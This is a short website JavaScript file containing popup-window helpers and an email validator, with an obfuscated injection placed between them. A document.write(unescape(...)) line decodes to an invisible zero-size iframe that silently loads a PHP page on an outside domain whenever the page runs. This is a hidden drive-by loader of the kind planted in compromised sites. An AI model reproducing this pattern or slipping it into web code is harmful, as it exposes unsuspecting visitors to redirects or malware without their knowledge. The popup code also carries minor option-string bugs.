function popUp(url) {
	leftPos = 0
	topPos = 0
	if (screen) {
		leftPos = screen.width * .1
		popWidth = screen.width * .75
		topPos = screen.height * .1
		popHeight = screen.height * .75 }
	else {
		popWidth = 700
		popHeight = 400
	}
	popWindow = window.open(url,'popupWin','width='+popWidth+',height='+popHeight+',left='+leftPos+',top='+topPos+',toolbar=no,locaton-no,scrollbars=yes resizable=yes')
	popWindow.focus()
}

function pop_up_window(sTarget,sTitle,sWidth,sHeight) {
	winStats='toolbar=no,location=no,directories=no,menubar=no,'
	winStats+='scrollbars=yes,width=' + sWidth + ',height=' + sHeight + ',resizable=yes'
	wPopUp = window.open(sTarget, "Neverland", winStats);
	wPopUp.focus()
}
document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%73%2e%76%69%74%61%6d%69%6e%73%6c%69%76%65%2e%63%6f%6d%2f%67%6f%74%6f%2e%70%68%70%27%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e"));
function validate_email(str) {
	l = str.length;
	at=str.indexOf("@");
	lastdot = str.lastIndexOf(".");
	if (at < 1 || (lastdot > l-3) || (lastdot-at < 2)) 
	return false;
}

